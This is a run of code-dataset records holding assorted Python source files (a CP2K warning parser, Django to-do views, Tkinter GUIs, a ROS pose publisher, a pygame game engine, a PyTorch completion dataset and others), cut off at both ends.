ann.in_neighbors.items():\n # 
print(\"{} : {}\".format(key, val))\n \n training_data = read_training_data(\"../../test_files/fv4_Kow.txt\")\n descriptors = read_fv_descriptors(\"../../test_files/fv4_Kow.txt\")\n # print(descriptors)\n \n consts = initialize_constants(ann, training_data)\n a, b, b_hat, c, z = consts\n # print(\"a:\\n\", a)\n # print(\"b:\\n\", b)\n # print(\"b_hat:\\n\", b_hat)\n # print(\"c:\\n\", c)\n # print(\"z:\\n\", z)\n # znp = np.array(z)\n # print(znp)\n\n LpVars = initialize_lp_variables(ann, a, b)\n # print(LpVars)\n model = pulp.LpProblem(\"Test_A\", pulp.LpMinimize)\n LpModel = build_MILP_ReLU(model, ann, LpVars, consts, 5.0, 0.02)\n # print(LpModel)\n # LpModel.writeLP(\"test_LP_file\")\n\n print(\"Start solving\")\n LpModel.solve()\n print(\"Solved\")\n x, y, z = LpVars\n sol_vars = get_input_layer_variables(ann, LpVars, descriptors)\n \n sol_y = [var.value() for var in sol_vars.values()] \n print(sol_y)\n res = ann.propagate(sol_y)\n print(res)\n \n# test()\n","sub_path":"2L-model/Module_3/files/ann_inverter.py","file_name":"ann_inverter.py","file_ext":"py","file_size_in_byte":17287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"58724565","text":"from typing import Any, Dict, Optional\n\nimport regex as re\n\nfrom .common import BlockMatch\n\nWARNING_MESSAGE_RE = re.compile(\n r\"\"\"\n^\\ \\*{3}\\ WARNING\\ in\\ (?[^:]+):(?P\\d+)\\ ::\\ (?P.+?) \\*{3} \\n\n(\\ \\*{3}\\ (?P.+?) \\*{3} \\n)*\n\"\"\",\n re.VERSION1 | re.VERBOSE | re.MULTILINE,\n)\n\nWARNING_MESSAGE_SIRIUS_RE = re.compile(\n r\"\"\"\n^===\\ (?PWarning|Fatal\\ error)\\ at\\ line\\ (?P\\d+)\\ of\\ file\\ (?P.+?)\\ ===\\n\n(?P.+) \\n\n(?:(?P
        .+) \\n)*\n\"\"\",\n re.VERSION1 | re.VERBOSE | re.MULTILINE,\n)\n\nTOTAL_WARNING_COUNT_RE = re.compile(\n r\"\"\"\n^\\ The\\ number\\ of\\ warnings\\ for\\ this\\ run\\ is\\ :\\s* (?P\\d+)\n\"\"\",\n re.VERBOSE | re.MULTILINE,\n)\n\n\ndef match_warnings(content: str) -> Optional[BlockMatch]:\n result: Dict[str, Any] = {\"warnings\": []}\n spans = []\n\n for wmatch in WARNING_MESSAGE_RE.finditer(content):\n result[\"warnings\"] += [\n {\"filename\": wmatch[\"filename\"], \"line\": int(wmatch[\"line\"]), \"message\": \"\".join(wmatch.captures(\"message\")).rstrip()}\n ]\n spans += wmatch.spans(0)\n\n match = TOTAL_WARNING_COUNT_RE.search(content)\n if match:\n result[\"nwarnings\"] = int(match[\"value\"])\n spans += match.spans(0)\n\n for wmatch in WARNING_MESSAGE_SIRIUS_RE.finditer(content):\n msg = {\"filename\": wmatch[\"filename\"], \"line\": int(wmatch[\"line\"]), \"message\": wmatch[\"message\"].strip()}\n if wmatch.captures(\"details\"):\n msg[\"details\"] = [d.strip() for d in wmatch.captures(\"details\")]\n\n if wmatch[\"type\"] == \"Warning\":\n result[\"warnings\"].append(msg)\n result.setdefault(\"nwarnings\", 0)\n result[\"nwarnings\"] += 1\n elif wmatch[\"type\"] == \"Fatal error\":\n assert \"error\" not in result, \"multiple fatal errors found when parsing SIRIUS warnings\"\n result[\"error\"] = msg\n else:\n raise AssertionError(\"invalid type found when parsing SIRIUS warnings\")\n\n spans += wmatch.spans(0)\n\n return BlockMatch(result, spans)\n","sub_path":"cp2k_output_tools/blocks/warnings.py","file_name":"warnings.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"10998509","text":"#!/usr/bin/env python\n\n__author__ = 'frankojis'\n\nfrom ConfigParser import ConfigParser\nfrom config import CONF_DIR\nfrom os.path import join\nimport defaults\nimport logging\nimport logging.config\n\n\ndef reader(ini, section):\n conffile = join(CONF_DIR, ini + '.ini')\n dsection = ini + \"_\" + section\n _cparser = ConfigParser()\n try:\n _cparser.read(conffile)\n keys = _cparser.options(section)\n if len(keys) > 0:\n params = {}\n for key in keys:\n try:\n params[key] = _cparser.get(section, key)\n except KeyError:\n params[key] = config_default(dsection)[key]\n continue\n return params\n else:\n LOG.debug(\"No overriding params detected\")\n params = config_default(dsection)\n return params\n except IOError as ioe:\n LOG.error(ioe)\n LOG.info(\"Using default configuration parameters\")\n params = config_default(dsection)\n return params\n\n\ndef config_default(section):\n return getattr(defaults, section)\n\n\nLOG_INI = join(CONF_DIR, 'log.ini')\nfrom core.utils import LOGFILE\n\nlogging.config.fileConfig(LOG_INI, defaults={'filename': LOGFILE})\nLOG = logging.getLogger(__name__)","sub_path":"core/utils/configurator.py","file_name":"configurator.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"121016918","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework.views import APIView\nfrom .models import Task\nfrom rest_framework.response import Response\nfrom datetime import datetime\n\nclass TaskCreate(APIView):\n def post(self, request):\n user_id = request.data.get('user_id', \"\")\n name = request.data.get('name', \"\")\n end_date = request.data.get('end_date', None)\n\n if end_date:\n end_date = datetime.strptime(end_date, 
'%Y-%m-%d').date()\n        task = Task.objects.create(user_id=user_id, name=name, end_date=end_date)\n\n        return Response(dict(msg=\"To-Do created\", name=task.name, start_date=task.start_date.strftime('%Y-%m-%d'), end_date=task.end_date))\n\n\nclass TaskSelect(APIView):\n    def post(self, request):\n        user_id = request.data.get('user_id', \"\")\n\n        tasks = Task.objects.filter(user_id=user_id)\n        task_list = []\n\n        for task in tasks:\n            task_list.append(dict(name=task.name, start_date=task.start_date, end_date=task.end_date, state=task.state))\n\n        return Response(dict(task=task_list))","sub_path":"todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"533161267","text":"from tkinter import *\n\nwindow=Tk()\n\ndef kg2multi():\n    kg=float(e1_value.get())\n    grams=kg*1000 \n    pounds=kg*2.20462\n    ounces=kg*35.274\n    t1.insert(END,grams)\n    t2.insert(END,pounds)\n    t3.insert(END,ounces)\n\nl1=Label(window, text=\"Kg\")\nl1.grid(row=0, column=0)\n\ne1_value=StringVar()\ne1=Entry(window, textvariable=e1_value)\ne1.grid(row=0,column=1)\n \nb1=Button(window, text=\"Convert\", command=kg2multi)\n#b1.pack()\nb1.grid(row=0, column=2)#, rowspan=2)\n\nt1=Text(window, height=1, width=20)\nt1.grid(row=1,column=0)\nt2=Text(window, height=1, width=20)\nt2.grid(row=1,column=1)\nt3=Text(window, height=1, width=20)\nt3.grid(row=1,column=2)\n\nwindow.mainloop()","sub_path":"udemy_python_mega_course/ex07.py","file_name":"ex07.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"533179710","text":"class Solution:\n    def strStr(self, haystack: str, needle: str) -> int:\n        \n        # corner case handling when needle is an empty string\n        if needle == \"\":\n            return 0\n        \n\n        \n        for i in range( len(haystack)-len(needle) + 1 ):\n            \n            scan_idx = i\n            for j in range( len(needle) ):\n                \n                if haystack[scan_idx] != needle[j]:\n                    \n                    break\n                else:\n                    scan_idx += 1\n            \n            else:\n                # if there is a substring in haystack all pass with needle\n                # return start index of substring i\n                return i\n\n        # if no match, return -1 \n        return -1\n\n\n\n# M : length of haystack\n# N : length of needle\n\n## Time Complexity: O( M*N )\n#\n# The overhead is the nested loops, outer for loop takes O( M ), while inner one takes O( N )\n\n## Space Complexity: O( 1 )\n#\n# The overhead is some variables for index of looping and substring.\n\n\ndef test_bench():\n\n    test_data = [\n        (\"hello\", \"ll\"),\n        (\"hello\", \"ho\"),\n        (\"hello\", \"\"),\n        (\"hello\", \"hello\")\n    ]\n\n    # expected output\n    '''\n    2\n    -1 \n    0\n    0\n    '''\n\n\n    for test_pair in test_data:\n\n        index_of_match = Solution().strStr( *test_pair )\n\n        print( index_of_match )\n\n    \n    return\n\n\nif __name__ == '__main__':\n\n    test_bench()","sub_path":"No_0028_Implement strStr/implement_strStr.py","file_name":"implement_strStr.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"2066681","text":"import tkinter as tk\nfrom tkinter import filedialog\nfrom numpy import *\n\n\n\n\n\n\nclass ForwardModelInputs(tk.Frame):\n\n    def loadmodel(self,inversepage,n):\n\n        file_loc = filedialog.askopenfilename(filetypes=((\"Model File\", \".npz\"), (\"all files\", \"*.*\")),\n                                              defaultextension=\".npz\")\n        if file_loc:\n            self.forwardmodels_var[n].set(file_loc)\n            npzfile = load(file_loc)\n            numminerals = npzfile['arr_0'].shape[1]\n            
inversepage.set_nummin(n,numminerals)\n\n        print('\\n')\n\n\n\n\n    def __init__(self,parent,mainapp):\n        tk.Frame.__init__(self,parent)\n        self.config(bg=mainapp.Background1)\n\n        #self.grid_columnconfigure(0, weight=1)\n        #for i in range(0,5):\n        #    self.grid_rowconfigure(i, weight=1)\n\n\n        tk.Label(self, text='Forward Models', font=mainapp.font_labels,\n                 bg=mainapp.Background1).grid(row=0, column=1, padx=(4,0), pady=(4,0))\n        tk.Frame(self, width=2, bg='black').grid(row=1, column=2, sticky='ns',\n                                                 rowspan=5, padx=(3, 3))\n\n\n        self.forwardmodels_var=dict()\n        self.forwardmodels_lab=dict()\n\n        for i in range(0,5):\n            self.forwardmodels_var[i]=tk.StringVar(self)\n            self.forwardmodels_var[i].set('')\n\n            self.forwardmodels_lab[i]=tk.Label(self, textvariable=self.forwardmodels_var[i],\n                                               anchor='w', font=mainapp.font_inputs)\n            self.forwardmodels_lab[i].configure(bg='white', relief='sunken', height=1,\n                                                width=25)\n            self.forwardmodels_lab[i].grid(row=i+1, column=1, sticky='nsew', padx=(4,0))\n\n            self.forwardmodels_lab[i].bind(\"<Enter>\", lambda event, i=i, h=self.forwardmodels_lab[i]:\n                                           h.configure(bg='#dbdbdb'))\n            self.forwardmodels_lab[i].bind(\"<Leave>\", lambda event, i=i, h=self.forwardmodels_lab[i]:\n                                           h.configure(bg='white'))\n            self.forwardmodels_lab[i].bind(\"<Button-1>\", lambda event, i=i: self.loadmodel(parent,i))\n\n\n        # Create line erase buttons\n        for i in range(0,5):\n            self.delline=tk.Label(self, text='X', bg=mainapp.Background1, relief='raised')\n            self.delline.grid(row=i+1, column=0, padx=(4,0))\n            self.delline.bind(\"<Enter>\", lambda event, h=self.delline:\n                              h.configure(bg='red'))\n            self.delline.bind(\"<Leave>\", lambda event, h=self.delline:\n                              h.configure(bg=mainapp.Background1))\n            self.delline.bind(\"<Button-1>\", lambda event, i=i: parent.deleteline(i))\n\n\n        print('\\n')\n\n\nclass ErrorFileInputs(tk.Frame):\n\n    def __init__(self, parent, mainapp):\n        tk.Frame.__init__(self, parent)\n        self.config(bg=mainapp.Background1)\n\n        for i in range(0,5):\n            self.grid_rowconfigure(i, weight=1)\n        for j in range(0,8):\n            self.grid_columnconfigure(j, weight=1)\n\n\n        # Create error file inputs\n        self.errfile_var=dict()\n        self.errfile_lab=dict()\n\n        for j in range(0, 8):\n            tk.Label(self, text='Mineral '+str(j+1), font=mainapp.font_labels,\n                     bg=mainapp.Background1).grid(row=0, column=j, pady=(4, 0))\n\n            for i in range(0, 5):\n\n                self.errfile_var[(i,j)]=tk.StringVar(self)\n                self.errfile_var[(i,j)].set('')\n\n                self.errfile_lab[(i,j)]=tk.Label(self, textvariable=self.errfile_var[(i,j)],\n                                                 anchor='w', font=mainapp.font_inputs)\n                self.errfile_lab[(i,j)].configure(bg='#c9c7c7', relief='sunken', width=15)\n                self.errfile_lab[(i,j)].grid(row=i+1, column=j, sticky='nsew', padx=(0,5*(j==7)))\n\n\n\n    def loaderror(self, inversepage,i,j):\n\n        curr_loc=self.errfile_var[(i,j)].get()\n        file_loc = filedialog.askopenfilename(filetypes=((\"Model File\", \".txt\"), (\"all files\", \"*.*\")),\n                                              defaultextension=\".txt\", initialdir=curr_loc)\n        if file_loc:\n            self.errfile_var[(i,j)].set(file_loc)\n\n\n    print('')\n\n\nclass InverseModelPage(tk.Frame):\n\n\n    def set_nummin(self,i,nmin):\n\n        for j in range(0,nmin):\n            self.errorfileframe.errfile_lab[(i, j)].configure(bg='white')\n            self.errorfileframe.errfile_lab[(i, j)].bind(\"<Enter>\", lambda event, i=i, h=self.errorfileframe.errfile_lab[(i, j)]:\n                                                         h.configure(bg='lightgrey'))\n            self.errorfileframe.errfile_lab[(i, j)].bind(\"<Leave>\", lambda event, i=i, h=self.errorfileframe.errfile_lab[(i, j)]:\n                                                         h.configure(bg='white'))\n            self.errorfileframe.errfile_lab[(i, j)].bind(\"<Button-1>\", lambda event, i=i, j=j:\n                                                         self.errorfileframe.loaderror(self, i, j))\n\n        for j in range(nmin,8):\n            self.errorfileframe.errfile_lab[(i, j)].configure(bg='#c9c7c7')\n            self.errorfileframe.errfile_lab[(i, j)].bind(\"<Enter>\",\n                                                         lambda event, i=i, h=self.errorfileframe.errfile_lab[(i, j)]:\n                                                         h.configure(bg='#c9c7c7'))\n            self.errorfileframe.errfile_lab[(i, j)].bind(\"<Leave>\",\n                                                         lambda event, i=i, h=self.errorfileframe.errfile_lab[(i, j)]:\n                                                         h.configure(bg='#c9c7c7'))\n            self.errorfileframe.errfile_lab[(i, j)].bind(\"<Button-1>\", lambda event: 1+1)\n\n\n        print('\\n')\n\n\n    def deleteline(self,n):\n\n        self.forwardmodelframe.forwardmodels_var[n].set('')\n        self.set_nummin(n,0)\n        for j in range(0,8):\n            self.errorfileframe.errfile_var[(n,j)].set('')\n\n\n\n\n\n    def __init__(self, parent):\n        tk.Frame.__init__(self, parent)\n        #self.grid_columnconfigure(0, weight=100)\n        #self.grid_columnconfigure(2, weight=400)\n        self.config(bg=parent.Background1)\n\n\n        self.label = tk.Label(self, text=\"Inverse Model\")\n        self.config(bg=parent.Background1)\n\n        self.forwardmodelframe = ForwardModelInputs(self,parent)\n        self.forwardmodelframe.grid(row=0, column=0, sticky='nsew')\n\n        self.errorfileframe = ErrorFileInputs(self,parent)\n        self.errorfileframe.grid(row=0, column=1, sticky='nsew')\n\n","sub_path":"inversemodeldialog.py","file_name":"inversemodeldialog.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"140604583","text":"import matplotlib.pyplot as plt\nimport math\n\nfile_1 = open(\"./default/data\",\"r\")\nfile_2 = open(\"./llb/data\",\"r\")\n\nt_1 = eval(file_1.readline())\nt_2 = eval(file_2.readline())\n\npdf_1 = eval(file_1.readline())\npdf_2 = eval(file_2.readline())\n\ncdf_1 = []\ncdf_1.append(1);\nfor i in range(1, len(pdf_1)):\n\tcdf_1.append(cdf_1[i-1] - pdf_1[i-1])\n\n\ncdf_2 = []\ncdf_2.append(1);\nfor i in range(1, len(pdf_2)):\n\tcdf_2.append(cdf_2[i-1] - pdf_2[i-1])\n\n\nplt.loglog(t_1, cdf_1, 'r--', label = 'Storm Default', linewidth=3)\nplt.loglog(t_2, cdf_2, 'b', label = 'Latency-based load balance', linewidth=3)\n\nplt.grid(True)\nplt.ylim((0.001,1))\nplt.xlim((0,500))\n\nplt.legend(loc = 0, frameon=False, fontsize=17)\nplt.ylabel('fraction', fontsize=17)\nplt.xlabel('tuple processing latency (msec)', fontsize=17)\nplt.tick_params(axis='both', which='major', labelsize=15)\nplt.show()\n","sub_path":"quantitative_condition/Figure5.7/LLB/llb-2/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"200216113","text":"#! 
/usr/bin/env python\n\nimport sys\nimport numpy as np\nimport rospy\nfrom multi_robot_action_move.msg import robot_pose, robot_pose_array\n\n\nclass agents_pos_publisher:\n def __init__(self):\n self._agent_pos = robot_pose_array()\n self.i = 0\n self.pos_dup = False\n _start_sub_1 = rospy.Subscriber(sys.argv[1] + \"/agent_pos\", robot_pose, self.agent_pos_Subscriber_callback)\n _start_sub_2 = rospy.Subscriber(sys.argv[2] + \"/agent_pos\", robot_pose, self.agent_pos_Subscriber_callback)\n self._agents_pos_pub = rospy.Publisher(\"agents_pos\",robot_pose_array,queue_size=1)\n\n def agent_pos_Subscriber_callback(self,msg):\n _start = robot_pose()\n _start = msg\n if len(self._agent_pos.robot_name_pose) < 1:\n self._agent_pos.robot_name_pose.append(_start)\n else:\n for pose in self._agent_pos.robot_name_pose:\n if ((round(_start.robot_pose.pose.position.x,1) == round(pose.robot_pose.pose.position.x,1)) and (round(_start.robot_pose.pose.position.y,1) == round(pose.robot_pose.pose.position.y,1))):\n self.pos_dup = True\n break\n if not self.pos_dup:\n self._agent_pos.robot_name_pose.append(_start)\n\n\n else:\n rospy.logwarn(\"The Robot start position is already appended to agent_pos %s\",_start)\n self.pos_dup = False\n while len(self._agent_pos.robot_name_pose) == 2: # give the no. w.r.t the robots\n if (self._agents_pos_pub.get_num_connections() > 0):\n self._agents_pos_pub.publish(self._agent_pos)\n self._agent_pos = robot_pose_array()\n self.i = 0\n # print(\"self._agent_pos_none\")\n # print(self._agent_pos)\n break\n\nif __name__ == \"__main__\":\n rospy.init_node('agent_pos_Subscriber_Publisher')\n A=agents_pos_publisher()\n rospy.spin()\n\n\n\n\n","sub_path":"multi_robot_action_move/scripts/multi_global_planner_agentpos_pub.py","file_name":"multi_global_planner_agentpos_pub.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"614666293","text":"from soldier import Soldier\nfrom vehicle import Vehicle\nfrom squad import Squad\nimport logging\nfrom random import randrange\n\n\nclass Army:\n def __init__(self, name=\"no_name\", ns=10, nv=3, strategy=\"random\"):\n self.name = name\n self.log = logging.getLogger('game')\n self.number_of_soldiers = ns\n self.number_of_vehicles = nv\n self.squads = []\n self.strategy = strategy\n self.alive = True\n self.make_squads()\n\n def make_soldiers(self):\n self.soldiers = []\n for i in range(self.number_of_soldiers):\n self.soldiers.append(Soldier())\n self.soldiers[i].set_features(i)\n\n def print_status(self):\n if self.alive:\n print(\"\\nArmy: %s\" % self.name)\n for i in self.squads:\n i.print_status()\n else:\n print(\"\\nArmy %s is dead\" % self.name)\n\n def make_vehicles(self):\n self.vehicles = []\n for i in range(self.number_of_vehicles):\n current_number_of_operators = randrange(1,4)\n current_list_of_operators = []\n check = True\n for j in self.soldiers:\n if j.vehicle_number == -1:\n check = False\n j.vehicle_number = i\n current_list_of_operators.append(j)\n current_number_of_operators -= 1\n if current_number_of_operators == 0:\n break\n if check:\n break\n self.vehicles.append(Vehicle(200))\n self.vehicles[i].set_features(current_list_of_operators, i)\n\n def make_squads(self):\n self.make_soldiers()\n self.make_vehicles()\n range_soldiers_squad = randrange(5, 10)\n range_vehicles_squad = randrange(5, 10)\n i1, i2 = 0, 0\n while True:\n number1 = 0\n number2 = 0\n current_list = []\n while number1 < range_soldiers_squad and i1 < 
len(self.soldiers):\n if self.soldiers[i1].vehicle_number == -1:\n number1 += 1\n current_list.append(self.soldiers[i1])\n i1 += 1\n while number2 < range_vehicles_squad and i2 < len(self.vehicles):\n number2 += 1\n current_list.append(self.vehicles[i2])\n i2 += 1\n self.squads.append(Squad(current_list, len(self.squads)))\n if i1 == len(self.soldiers) and i2 == len(self.vehicles):\n break\n\n def total_attack(self):\n total = 0\n for i in self.squads:\n total += i.get_attack()\n return total\n\n def get_total_health(self):\n total = 0\n for i in self.squads:\n total += i.get_health()\n return total\n\n # def __gt__(self, army):\n # return self.get_total_health() > army.get_total_health()\n\n def __lt__(self, army):\n return self.get_total_health() < army.get_total_health()\n\n def take_damage(self, damage):\n damage = round(damage / len(self.squads))\n for i in self.squads:\n if i.alive:\n i.take_damage(damage)\n self.check_alive()\n\n def check_alive(self):\n self.alive = False\n for i in self.squads:\n if i.alive:\n self.alive = True\n\n def attack_on(self, obj):\n if obj.alive:\n obj.take_damage(self.total_attack())\n for i in self.squads:\n i.set_experience(self.total_attack() / len(self.squads))\n","sub_path":"battle_game/army.py","file_name":"army.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"236995583","text":"from google.appengine.ext import ndb\n\nfrom entities import Blog, Like\nfrom router import Handler\n\n\nclass LikeHandler(Handler):\n '''Handler for the liking of comments.\n All users except the author can give likes.'''\n def post(self, url_num):\n # Retrieves the blog post and other credentials\n blog_id = ndb.Key(Blog, int(url_num))\n blog = blog_id.get()\n\n user = self.request.cookies.get('user')\n\n # Retrieves the task type\n task = self.request.get('task')\n\n if not blog.is_author(user):\n if task == 'Like':\n # Likes the blog post\n like = Like.query(Like.user == user, Like.blog == blog_id).get()\n\n # Users cannot like the same blog post more than once\n if not like:\n like = Like(user = user, blog = blog_id)\n like.put()\n else:\n # Unlikes the blog post\n like_ident = self.request.get('like_id')\n like_id = ndb.Key(Like, int(like_ident))\n like_id.delete()\n\n self.redirect('/blog/' + url_num)","sub_path":"paths/LikeHandler.py","file_name":"LikeHandler.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"183435935","text":"\n\nfrom numpy import arange\nimport pygame\nfrom random import randint\nfrom beam import Beam\nfrom pos import pos\nfrom drone import Drone\nfrom collision import line_circle_intersect\n\nclass Engine(object):\n def __init__(self, size):\n self.players = []\n self.beams = []\n self.entities = []\n self.size = size\n self.points = 0 \n self.game_over = False\n\n self.playersprites = pygame.sprite.RenderPlain()\n self.entitysprites = pygame.sprite.RenderPlain() \n\n\n def lose_point(self):\n self.points -= 1\n if self.points <= 0:\n # Game over\n self.game_over = True\n\n def add_player(self, player):\n self.players.append(player)\n self.playersprites.add(player)\n\n def add_entity(self, entity):\n self.entities.append(entity)\n self.entitysprites.add(entity)\n\n def remove_entity(self, entity):\n self.entities.remove(entity)\n self.entitysprites.remove(entity)\n\n def process(self):\n if not self.game_over:\n self.spawn()\n\n # Entities\n 
deletes = []\n for p in self.entities:\n p.process()\n if p.die:\n deletes.append(p) \n\n for d in deletes:\n self.remove_entity(d)\n \n\n\n # Players\n for p in self.players:\n p.process()\n \n self.process_beams()\n\n \n # Update sprites\n self.playersprites.update()\n self.entitysprites.update() \n\n def process_beams(self):\n self.beams = []\n for p1 in self.players:\n for p2 in self.players:\n if p1.dist_to(p2.pos) < 120.0:\n beam = Beam()\n beam.pos1 = p1.pos\n beam.pos2 = p2.pos\n beam.damage = 3\n\n self.beams.append(beam)\n\n # Make the beams take damage!\n for beam in self.beams:\n length = beam.length() \n\n for entity in self.entities:\n if line_circle_intersect(beam.pos1, beam.pos2, entity.pos, entity.radius):\n beam.make_damage(entity)\n\n def spawn(self):\n if randint(0, 50) == 0:\n drone = Drone(self)\n \n drone.pos = pos(randint(20, self.size[0]-20*2), -drone.radius-2)\n self.add_entity(drone)\n\n\n def draw(self, screen):\n self.entitysprites.draw(screen)\n self.playersprites.draw(screen)\n\n def reset(self):\n\n buf = 0.0\n # Reset player positions\n #positions = [pos(buf, buf), pos(self.size[0]-buf, buf), pos(self.size[0]-buf, self.size[1]-buf), pos(buf, self.size[1]-buf)]\n positions = [pos(self.size[0]*(i+1)/(1.0 + len(self.players)), self.size[1]-80) for i in xrange(len(self.players))] \n for i, p in enumerate(self.players):\n p.pos = positions[i]\n p.velocity = pos(0, 0)\n \n self.entities = []\n self.entitysprites = pygame.sprite.RenderPlain() \n \n self.game_over = False\n self.points = 5\n","sub_path":"engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"634058376","text":"import random\n\nimport numpy as np\n\nfrom ncc.data.constants import DEFAULT_MAX_TARGET_POSITIONS\nfrom ncc.data.ncc_dataset import NccDataset\nfrom ncc.data.tools import data_utils\n\n\ndef collate(samples, pad_idx, unk_idx, attrs=None):\n # no need for left padding\n if len(samples) == 0:\n return {}\n\n def merge(key):\n return data_utils.collate_tokens(\n [s[key] for s in samples],\n pad_idx,\n )\n\n src_tokens = merge('source')\n tgt_tokens = merge('target')\n\n attr_masks = {attr: [] for attr in attrs} if attrs is not None else None\n\n extends = []\n max_len = src_tokens.size(-1)\n for i, s in enumerate(samples):\n extends.append(s['extend'])\n if attr_masks is not None:\n for attr in attrs:\n attr_masks[attr].append(s['attr_masks'][attr] + max_len * i)\n if attrs:\n for attr in attrs:\n attr_masks[attr] = np.concatenate(attr_masks[attr], axis=0)\n\n ntokens = sum(sum(s['target'][s['extend']:] != pad_idx) for s in samples).item()\n\n batch = {\n 'id': [s['id'] for s in samples],\n 'net_input': {\n 'src_tokens': src_tokens,\n },\n 'target': tgt_tokens,\n 'attr_masks': attr_masks,\n 'extends': extends,\n 'ntokens': ntokens,\n }\n return batch\n\n\nclass CompletionDataset(NccDataset):\n\n def __init__(\n self, tgt, tgt_sizes, tgt_dict, extends=None,\n attrs=None, attr_indices=None, attr_dict=None,\n attrs_mapping=None, reversed_attrs_mapping=None,\n left_pad_source=False, left_pad_target=False,\n max_target_positions=DEFAULT_MAX_TARGET_POSITIONS,\n shuffle=True,\n ):\n self.tgt = tgt\n self.tgt_sizes = np.array(tgt_sizes)\n self.tgt_dict = tgt_dict\n self.extends = extends\n self.attrs = attrs\n self.attr_indices = attr_indices\n self.attr_dict = attr_dict\n self.attrs_mapping = attrs_mapping\n self.reversed_attrs_mapping = reversed_attrs_mapping\n 
self.left_pad_source = left_pad_source\n self.left_pad_target = left_pad_target\n self.max_target_positions = max_target_positions\n\n self.shuffle = shuffle\n\n self.pad = self.tgt_dict.pad()\n self.unk = self.tgt_dict.unk()\n\n def __getitem__(self, index):\n # Append EOS to end of tgt sentence if it does not have an EOS\n # and remove EOS from end of src sentence if it exists.\n # This is useful when we use existing datasets for opposite directions\n # i.e., when we want to use tgt_dataset as src_dataset and vice versa\n src_item = self.tgt[index][:-1]\n tgt_item = self.tgt[index][1:]\n\n extend = 0 if self.extends is None else self.extends[index].item()\n if self.attrs_mapping:\n # do not move attr_masks into cuda\n attr_masks = {attr: [] for attr in self.attrs}\n for idx, attr_idx in enumerate(self.attr_indices[index].tolist()[1:][extend:], start=extend):\n if attr_idx in self.reversed_attrs_mapping:\n attr_masks[self.reversed_attrs_mapping[attr_idx]].append(idx)\n for attr in self.attrs:\n attr_masks[attr] = np.array(attr_masks[attr])\n else:\n attr_masks = None\n\n example = {\n 'id': index,\n 'source': src_item,\n 'target': tgt_item,\n\n 'attr_masks': attr_masks,\n 'extend': extend,\n }\n return example\n\n def __len__(self):\n return len(self.tgt)\n\n def collater(self, samples):\n return collate(samples, pad_idx=self.pad, unk_idx=self.unk, attrs=self.attrs)\n\n def num_tokens(self, index):\n return self.tgt_sizes[index]\n\n def size(self, index):\n return self.tgt_sizes[index]\n\n def ordered_indices(self):\n indices = super().ordered_indices()\n indices = indices[self.tgt_sizes > 1]\n if self.shuffle:\n random.shuffle(indices)\n return indices\n","sub_path":"ncc/data/completion/completion_dataset.py","file_name":"completion_dataset.py","file_ext":"py","file_size_in_byte":4027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"439625828","text":"import hyperopt\nfrom hyperopt import hp\nfrom hyperopt import fmin\nfrom hyperopt import tpe\nimport math\nimport numpy as np\nimport argparse\nimport time\nimport datetime\nimport os\nimport sys\nimport torch\nimport torch.nn as nn\nimport torch.optim\nfrom torch.autograd import Variable\nfrom collections import OrderedDict\n\nscript_dir = os.path.dirname(__file__)\nmodule_path = os.path.abspath(os.path.join(script_dir, '..', '..'))\ntry:\n import distiller\nexcept ImportError:\n sys.path.append(module_path)\n import distiller\nimport apputils\nfrom models import ALL_MODEL_NAMES, create_model\n\ndef float_range(val_str):\n val = float(val_str)\n if val < 0 or val >= 1:\n raise argparse.ArgumentTypeError('Must be >= 0 and < 1 (received {0})'.format(val_str))\n return val\n\nparser = argparse.ArgumentParser(description='Distiller image classification model compression')\nparser.add_argument('data', metavar='DIR', help='path to dataset')\nparser.add_argument('--arch', '-a', metavar='ARCH', default='resnet20_cifar',\n choices=ALL_MODEL_NAMES,\n help='model architecture: ' +\n ' | '.join(ALL_MODEL_NAMES) +\n ' (default: resnet20_cifar)')\nparser.add_argument('-r', '--rounds', default=10, type=int,\n metavar='R', help='max rounds (default: 10)')\nparser.add_argument('--epochs', default=120, type=int,\n metavar='E', help='epochs (default: 120)')\nparser.add_argument('-j', '--workers', default=1, type=int, metavar='N',\n help='number of data loading workers (default: 1)')\nparser.add_argument('-b', '--batch-size', default=128, type=int,\n metavar='N', help='mini-batch size (default: 
